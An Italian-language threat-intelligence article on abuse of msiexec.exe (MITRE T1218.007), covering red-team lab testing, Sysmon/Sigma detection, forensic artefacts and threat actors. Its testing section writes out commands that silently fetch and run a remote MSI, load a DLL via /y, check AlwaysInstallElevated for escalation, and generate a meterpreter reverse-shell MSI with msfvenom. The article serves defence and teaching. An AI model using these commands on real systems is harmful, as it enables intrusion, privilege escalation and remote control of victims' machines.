Esecuzione Proxy via Msiexec: System Binary Proxy Execution: Msiexec (T1218.007)

Il test di questa tecnica in laboratorio è immediato perché msiexec.exe è già presente su qualsiasi sistema Windows — non serve nulla di aggiuntivo. La superficie d'attacco si divide in tre scenari operativi distinti.

Esecuzione di un pacchetto MSI remoto. Questo è il pattern più comune tra i gruppi documentati. Il comando scarica ed esegue un installer da un server controllato dall'attaccante, il tutto in un'unica azione:

msiexec /i <URL-del-pacchetto-MSI> /quiet /qn

I flag /quiet e /qn sopprimono qualsiasi interfaccia utente, rendendo l'esecuzione invisibile all'utente. Rancor e ZIRCONIUM hanno impiegato esattamente questa modalità per scaricare payload via HTTP. Per il lab, è sufficiente ospitare un file MSI su un web server locale con Python — python3 -m http.server 8080 — e puntare msiexec al proprio indirizzo.

Esecuzione di DLL tramite msiexec. Meno intuitivo ma altrettanto efficace, il flag /y consente di richiamare la funzione DllRegisterServer di una DLL arbitraria:

msiexec /y C:\Temp\payload.dll

Questo vettore è stato sfruttato da DEADEYE per caricare DLL malevole. Per il red team, si può generare una DLL con msfvenom (Metasploit Framework, open source) usando il formato dll e testarla localmente.

Verifica della policy AlwaysInstallElevated. Prima di testare l'escalation, bisogna controllare se la policy è abilitata nelle due chiavi di registro rilevanti:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Se entrambe restituiscono valore 1, qualsiasi utente può eseguire un MSI con privilegi SYSTEM. In ambienti di penetration test, winPEAS (open source) automatizza questo controllo nella sezione dedicata alle misconfigurazioni di Windows Installer.

Per creare un pacchetto MSI personalizzato con payload embedded, lo strumento WiX Toolset (open source) consente di generare installer legittimi con custom action che eseguono comandi arbitrari. In alternativa, msfvenom genera direttamente un MSI con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORTA> -f msi -o payload.msi.

Un aspetto da validare è il comportamento delle soluzioni di application control: eseguendo un MSI non firmato tramite msiexec.exe firmato da Microsoft, molte policy WDAC configurate in modo permissivo lasciano passare l'esecuzione — ed è esattamente il punto debole che questa tecnica sfrutta.

La detection di msiexec.exe è un esercizio di equilibrio: è un binario legittimo invocato centinaia di volte al giorno per aggiornamenti software, installazioni aziendali e patch di sistema. Il trucco è separare l'uso legittimo dall'abuso concentrandosi su tre dimensioni — command line, rete e moduli caricati — e correlandole in una finestra temporale stretta.

Log source critici. Il fondamento è Sysmon (open source), installato con una configurazione che catturi almeno EventCode 1 (process creation), EventCode 3 (network connection) e EventCode 7 (image loaded). I log di Windows Security con policy di audit avanzata (EventCode 4688 con command line logging abilitato) rappresentano il secondo pilastro. La combinazione di entrambi alimenta le regole di correlazione.

La regola cardine monitora il processo msiexec.exe correlando la sua command line con pattern sospetti. I segnali forti includono: URL HTTP/HTTPS nella command line, percorsi UNC verso host esterni, il flag /y per il caricamento DLL, e l'uso combinato di /quiet /qn con sorgenti non aziendali. Una regola Sigma ben strutturata filtra su Image che termina con msiexec.exe e CommandLine che contiene pattern come http, \\ (UNC), o /y.

Correlazione comportamentale. L'analisi DET0158 indica di correlare l'esecuzione di msiexec.exe con connessioni di rete verso destinazioni mai viste prima, all'interno di una finestra temporale configurabile. In pratica, nel SIEM si costruisce una catena: spawn di msiexec.exe con argomenti sospetti → connessione di rete entro 30-60 secondi → caricamento di moduli non standard. Questa catena a tre stadi riduce drasticamente i falsi positivi.

Per il tuning, i parametri chiave sono quattro:

• SuspiciousCommandlinePatterns: pattern regex per URL, UNC, flag DLL
• SuspiciousDestinationList: range IP e domini non aziendali
• LegitimateMSIHashes: hash SHA-256 dei pacchetti MSI noti e approvati dal software distribution aziendale
• TimeWindow: finestra di correlazione (30-120 secondi)

Un approccio efficace per abbattere il rumore è mantenere una whitelist di hash MSI legittimi derivata dalla pipeline SCCM/Intune. Ogni MSI eseguito il cui hash non compare in lista genera un alert a media severità; se combinato con connessione di rete esterna, la severità sale ad alta.

Attenzione al pattern di IcedID, che si inietta in un processo msiexec.exe sospeso. In questo caso il processo appare legittimo ma genera beacon C2. La detection richiede il monitoraggio di msiexec.exe con connessioni di rete persistenti verso IP esterni senza corrispondente installazione MSI — un comportamento anomalo che Sysmon EventCode 3 cattura efficacemente.

L'analisi forense dell'abuso di msiexec.exe beneficia di una ricchezza di artefatti: Windows Installer lascia tracce in log dedicati, nel registro, nel filesystem e negli event log. La chiave è sapere dove cercare e come correlare temporalmente i frammenti.

Artefatti filesystem. Il primo punto d'indagine è la directory C:\Windows\Installer, dove Windows conserva una copia cache dei pacchetti MSI installati. File MSI con nomi casuali, hash sconosciuti o timestamp anomali sono indicatori immediati. La directory temporanea %TEMP% e C:\Windows\Temp possono contenere file estratti durante l'installazione — nel caso della campagna 3CX Supply Chain Attack (C0057), l'installer MSI estraeva diversi file tra cui l'eseguibile 3CXDesktopApp.exe e la libreria malevola ffmpeg.dll.

Log di Windows Installer. Il servizio MSI scrive nel log eventi Application con sorgente MsiInstaller, registrando EventID 1033 (installazione completata) e EventID 1034 (rimozione). Questi eventi contengono il nome del prodotto, il produttore e il percorso del pacchetto — informazioni preziose per identificare installer malevoli. Per un'analisi più granulare, se l'installazione è stata eseguita con /log, il file di log MSI dettagliato registra ogni custom action eseguita.

Registro di sistema. Ogni MSI installato crea chiavi sotto HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall (o l'equivalente Wow6432Node). Per la verifica della misconfiguration AlwaysInstallElevated, le chiavi rilevanti si trovano sia sotto HKLM che HKCU nel percorso SOFTWARE\Policies\Microsoft\Windows\Installer. Il valore 1 in entrambe le location conferma che la policy era attiva al momento dell'intrusione.

Prefetch e Amcache. Il file di prefetch MSIEXEC.EXE-{hash}.pf registra i file e le directory accedute durante le ultime esecuzioni, inclusi i percorsi delle DLL caricate. Lo strumento PECmd di Eric Zimmerman (open source) analizza i file prefetch estraendo timestamp e lista di file referenziati. L'Amcache (C:\Windows\AppCompat\Programs\Amcache.hve) registra hash SHA-1 degli eseguibili lanciati, fornendo un ancoraggio crittografico per la timeline.

Ricostruzione della catena. La sequenza investigativa tipica per questa tecnica parte dall'identificazione dell'evento Sysmon EventCode 1 con msiexec.exe e argomenti sospetti, prosegue con l'analisi delle connessioni di rete correlate (EventCode 3), si estende ai moduli caricati (EventCode 7) e si chiude con l'esame dei file estratti nel filesystem. Nella campagna RedDelta Modified PlugX Infection Chain Operations (C0047), il flusso prevedeva il download di un MSI tramite phishing iniziale, seguito dall'estrazione di componenti che portavano all'installazione persistente di PlugX — ogni passaggio lascia artefatti distinti nel prefetch, nei log MsiInstaller e nel registro.

Per l'acquisizione forense, MFTECmd (open source) di Eric Zimmerman consente di estrarre timestamp $MFT per tutti i file nella directory Windows Installer, mentre Timeline Explorer (open source) dello stesso autore facilita la correlazione visiva degli eventi.

L'abuso di msiexec.exe attraversa confini geografici e motivazionali diversi, il che lo rende un indicatore debole se preso in isolamento, ma un eccellente pivot per la correlazione con TTP adiacenti quando si analizzano cluster specifici.

APT38 opera con motivazione finanziaria legata alla Corea del Nord e ha impiegato msiexec.exe come componente di esecuzione nelle sue operazioni contro istituzioni finanziarie. Il collegamento con la campagna 3CX Supply Chain Attack (C0057) — dove AppleJeus, malware associato allo stesso ecosistema, è stato distribuito tramite pacchetti MSI — evidenzia una preferenza strutturale per gli installer Windows come vettore di deployment in attacchi alla supply chain. L'impatto di questa campagna è significativo: 3CX serve oltre 600.000 clienti e 12 milioni di utenti, con targeting successivo focalizzato sui settori difesa e criptovalute.

TA505 è un gruppo a motivazione finanziaria con un'operatività ad ampio spettro. L'uso di msiexec per scaricare ed eseguire installer malevoli si inserisce in catene d'attacco che includono famiglie malware come FlawedAmmyy e Clop — entrambi presenti tra i software documentati per questa tecnica. Clop in particolare sfrutta msiexec.exe non solo per l'esecuzione, ma anche per disabilitare strumenti di sicurezza, aggiungendo una dimensione di sabotaggio difensivo.

Molerats e ZIRCONIUM rappresentano il versante dello spionaggio — il primo legato al Medio Oriente, il secondo alla Cina. Entrambi usano msiexec.exe come proxy di esecuzione, ma in contesti operativi differenti: Molerats per eseguire payload MSI locali, ZIRCONIUM per il download remoto. Rancor, attivo nel Sud-Est asiatico, condivide con ZIRCONIUM il pattern di download HTTP tramite msiexec. La campagna RedDelta Modified PlugX Infection Chain Operations (C0047), condotta da Mustang Panda tra 2023 e 2024 contro target in Asia orientale e sudorientale, conferma la persistenza di questo vettore nell'ecosistema APT cinese con l'uso di MSI per il delivery di PlugX.

Machete, attivo in America Latina con focus su organizzazioni governative e militari, utilizza msiexec per installare il proprio malware omonimo. Questo si riflette nell'ampia adozione della tecnica da parte di banking trojan latinoamericani: Grandoreiro, Javali, Melcoz, Metamorfo e Mispadu — tutti appartenenti alla famiglia dei trojan bancari brasiliani — utilizzano pacchetti MSI come vettore primario di esecuzione.

Il trend emergente vede msiexec.exe impiegato sempre più in catene di supply chain (3CX), in loader modulari come Latrodectus e Raspberry Robin — quest'ultimo usa msiexec.exe per comunicazioni C2 post-installazione — e nel deployment di ransomware come Ragnar Locker e Maze. La convergenza di attori statali e criminali su questo binario suggerisce che il monitoraggio di msiexec.exe debba essere una priorità trasversale, indipendente dal profilo di minaccia specifico dell'organizzazione.

Framework MITRE ATT&CK v16 — T1218.007 (System Binary Proxy Execution: Msiexec), TA0005. Campagne: C0057 (3CX Supply Chain Attack), C0047 (RedDelta Modified PlugX Infection Chain Operations). Detection: DET0158 / AN0445. Mitigazioni: M1042, M1026. Tool di detection: Sysmon, PECmd, MFTECmd, Timeline Explorer. Integrato con conoscenza professionale per tool e procedure operative.